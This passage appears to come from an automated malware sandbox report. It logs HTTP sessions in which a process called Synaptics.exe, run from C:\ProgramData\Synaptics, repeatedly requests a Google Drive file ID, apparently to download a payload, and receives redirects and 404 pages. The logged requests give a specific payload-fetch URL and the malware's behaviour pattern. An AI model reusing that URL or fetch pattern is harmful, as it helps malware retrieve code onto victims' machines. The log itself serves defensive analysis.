                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7t4IjvbaMkTWaJc_jn8pG3XhnnjStaLLV_yWRIynjVbHCQEhAaohIlN7PC6q_WoGgU
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-0zrqcvvWIOCk9LBLBlO8Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 4f 6e 62 32 4a 51 70 4a 5a 4f 4b 34 7a 62 58 72 6d 50 32 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="DOnb2JQpJZOK4zbXrmP2YA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            38192.168.2.849783142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:21 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-dmgQc-1DXBnw4Vb3jHUvjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            39192.168.2.849782142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:21 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-KUycKH5UV62urxVps6-26A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            40192.168.2.849784142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:21 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:21 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6C_HpLn0ifJlg5HdiyY8OGu-Dna7QaV_QXzTjNm-8XM8aiF1ZKxEIVV2WXnLdiIA73
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:21 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-f3QdbNMcWNKHGrz8nEYfiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:21 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:21 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 4b 61 63 75 51 74 31 53 64 6a 68 54 47 57 6f 52 50 79 37 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="0KacuQt1SdjhTGWoRPy7Xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:21 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            41192.168.2.849788142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            42192.168.2.849789142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:22 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            43192.168.2.849787142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:22 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            44192.168.2.849790142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            45192.168.2.849794142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:23 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-NcC3_rU8CgYRNu-6x9mdgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            46192.168.2.849795142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:23 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-n3xUfW2FXnnH0kFdti6uMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            47192.168.2.849800142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:24 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-CEBxg_oy6sq7jkK4dJrBHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
